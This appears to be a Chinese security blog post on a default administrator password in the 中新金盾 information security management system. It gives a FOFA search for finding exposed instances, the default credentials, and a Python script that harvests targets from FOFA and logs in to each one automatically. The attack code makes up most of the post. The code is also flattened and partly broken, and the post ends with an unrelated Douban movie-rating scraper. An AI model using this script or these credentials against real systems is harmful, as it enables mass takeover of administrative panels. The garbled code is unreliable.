中新金盾信息安全管理系统存在默认密码
2024-05-16 03:18:56
FOFA查询:title=“中新金盾信息安全管理系统”
系统默认管理员账号密码:admin/zxsoft1234!@#$
1、查找中新金盾信息安全管理系统的poc:
import re
import requests
# 获取网页内容
r = requests.get('https://fofa.so/result?qbase64=dGl0bGU9IuS4reaWsOmHkeebvuS%2FoeaBr%2BWuieWFqOeuoeeQhuezu%2Be7nyI%3D')
data = r.text# 利用正则查找所有连接
link_list =re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')" ,data)
for url in link_list:print(url)
2、漏洞脚本
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m')print('+ 33[34m公众号 : PeiQi文库 33[0m')print('+ 33[34mVersion: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 33[0m')print('+ 33[36m使用格式: python3 poc.py 33[0m')print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m')print('+------------------------------------------')def POC_1(target_url):vuln_url = target_url + "?q=common/getcode"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print("33[36m[o] 正在获取验证码 {}?q=common/getcode ..... 33[0m".format(target_url))response_data = response.headers['Set-Cookie']check_code = re.findall(r'check_code=(.*?);', response_data)[0]PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]print("33[36m[o] 验证码:{}n[o] PHPSESSID:{} 33[0m".format(check_code, PHPSESSID))POC_2(target_url, check_code, PHPSESSID)except Exception as e:print("33[31m[x] 请求失败 33[0m", e)def POC_2(target_url, check_code, PHPSESSID):vuln_url = target_url + "?q=common/login"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if "1" in response.text and response.status_code == 200:print("33[36m[o] 目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ 33[0m".format(target_url))else:print("33[31m[x] 目标 {} 不存在默认管理员弱口令 33[0m".format(target_url))except Exception as e:print("33[31m[x] 请求失败 33[0m", e)if __name__ == '__main__':title()target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m"))POC_1(target_url)
运行之后,输入IP,结果如下:
合并1、2
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningimport re
import requests
r = requests.get('https://fofa.so/result?qbase64=dGl0bGU9IuS4reaWsOmHkeebvuS%2FoeaBr%2BWuieWFqOeuoeeQhuezu%2Be7nyI%3D')
data = r.text# 利用正则查找所有连接
link_list =re.findall(r"(?<=a href=\").+?(?=\")" ,data)
def title():print('+------------------------------------------')print('+ POC_Des: http://wiki.peiqi.tech ')print('+ Github : https://github.com/PeiQi0 ')print('+ Version: 中新金盾信息安全管理系统 默认超级管理员密码漏洞 ')print('+ 使用格式: python3 poc.py ')print('+ Url >>> http://xxx.xxx.xxx.xxx ')print('+------------------------------------------')
def POC_1(target_url):vuln_url = target_url + "?q=common/getcode"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",}try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)print(" 正在获取验证码 {}?q=common/getcode ..... ".format(target_url))response_data = response.headers['Set-Cookie']check_code = re.findall(r'check_code=(.*?);', response_data)[0]PHPSESSID = re.findall(r'PHPSESSID=(.*?);', response_data)[0]print(" 验证码: PHPSESSID:{} ".format(check_code, PHPSESSID))POC_2(target_url, check_code, PHPSESSID)except Exception as e:print("[x] 请求失败 ", e)def POC_2(target_url, check_code, PHPSESSID):vuln_url = target_url + "?q=common/login"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Cookie":"PHPSESSID={}; check_code={}".format(PHPSESSID, check_code),"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}data = "name=admin&password=zxsoft1234!%40%23%24&checkcode={}&doLoginSubmit=1".format(check_code)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)if "1" in response.text and response.status_code == 200:print("目标 {} 存在默认管理员弱口令 admin / zxsoft1234!@#$ 33[0m".format(target_url))else:print("目标 {} 不存在默认管理员弱口令 33[0m".format(target_url))except Exception as e:print("33[31m[x] 请求失败 33[0m", e)for url in link_list:if "http" in url:if __name__ == '__main__':title()POC_1(url)
结果则自动运行。。。
3、一个爬取豆瓣评分排名的poc
import urllib.request
import reheaders ={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36"
}url="https://movie.douban.com/j/chart/top_list?type=11&interval_id=100%3A90&action=&start=0&limit=100"req=urllib.request.Request(url,headers=headers)data=urllib.request.urlopen(req).read().decode()
pat1=r'"rating":\["(.*?)","\d+"\]'
pat2=r'"title":"(.*?)"'pettern1=re.compile(pat1)
pettern2=re.compile(pat2)data1=pettern1.findall(data)
data2=pettern2.findall(data)for x in range(len(data1)):print("排名:",x+1,"电影名:",data2[x],"豆瓣评分:",data1[x])
运行结果如下:
中新金盾信息安全管理系统存在默认密码相关推荐
- 中新金盾DDOS软件防火墙——防御CC攻击的好帮手
针对当前的DOS/DDOS攻击现状,安徽中新软件自主研发的抗拒绝服务产品--金盾抗DDOS防火墙,具有很强的DOS/DDOS攻击的防护能力.并可在多种网络环境下轻松部署,保证网络的整体性能和可靠性. ...
- 中新金盾软防产品介绍
金盾软防简要介绍金盾软防价格对比 针对当前的DOS/DDOS***现状,安徽中新软件自主研发的抗拒绝服务产品--金盾抗DDOS防火墙,具有很强的DOS/DDOS***的防护能力.并可在多种网络环境下轻 ...
- linux 创建目录 默认权限,如何设置UNIX/Linux中新创建目录或文件的默认权限
在unix或者linux中,每创建一个文件或者目录时,这个文件或者目录都具有一个默认的权限,比如目录755,文件644,那么这些默认权限是怎么控制的呢? 答案是"umask"权限掩 ...
- Linux——安全权限(禁止添加新用户+umask值+修改默认密码最长有效期)
目录 一.不再允许添加新用户的请求 演示: 二.umask值: (1)简介: (2)查看: (3)为什么 umask 里目录是 022,文件是 002? (4)演示: (5)更改: 三.修改默认的密码 ...
- Linux如何查询目录默认权限,如何设置UNIX/Linux中新创建目录或文件的默认权限
在unix或者linux中,创建一个新文件或者目录时,这个文件或者目录都具有一个默认的权限,比如目录755,文件644,这些默认权限是由umask(权限掩码)来控制的,一般umask默认值为022,其 ...
- webbrowser打开指定html,C#实现 WebBrowser中新窗口打开链接用默认或者指定浏览器打开,不用IE...
首先要捕获打开链接的事件,这个事件在 WebBrowser的NewWindow里面. 这里我的WebBrowser命名为announce.所以捕获事件如下: private void announce ...
- 新kali版本,root默认密码
新版本kali root密码不是toor,而是kali/kali 更改root密码: 先用创建的普通用户密码登录,然后打开终端输入: sudo su 登录成功用户名会从自己创建变成root 然后输入命 ...
- 常见网络设备/应用的默认密码的几种收集方式
有时候在做测试时候,可能一个默认密码就进去了,汇总几种 百度/Google/社工 自己百度orGoogle密码,弄不到就找到客服联系方式,伪装成购买设备后不知道默认密码的向厂商客服询问 几个网络设备默 ...
- 网络安全设备默认密码
因为触及敏感词v-p-n,需要将 '-'去掉. 设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanre ...
最新文章
- 请求时的编码问题 Use body.encode(‘utf-8‘) if you want to send it encoded in UTF-8
- halcon知识:ncc_model模板匹配
- Java集合中的排序API分析
- OSPF动态路由协议入门简介
- 【动态规划】线性dp P1043 数字游戏
- EasyRecovery——一款专业的数据恢复软件
- SpringBoot中级篇-SpringBatch+Oracle配置
- VGG16网络结构与代码
- 2023北京航空航天大学计算机考研信息汇总
- 【金猿人物展】龙盈智达首席数据科学家王彦博:量子科技为AI大数据创新发展注入新动能...
- 提升自己的实力才是硬道理
- iphone app 的图标上被自动添加一层半透明遮罩(玻璃效果),小米3这样的高分屏icon不生效,怎么破?
- 7-2 愿天下有情人都是失散多年的兄妹 (25 分)
- DSPE-Thiol; DSPE-SH; 二硬脂酰磷脂酰乙醇胺改性巯基
- 宋君强 学科评估 计算机科学,宋君强
- 日期间隔计算器-计算两个日期之间相差多少天-计算某天之后的多少天是几号计算器
- 详解Material Design体系组件
- 2019秋招|已拿BAT等7家offer大佬的秋招总结建议
- powerbuilder11的体验[转载]
- 生成Jupyter Lab快捷方式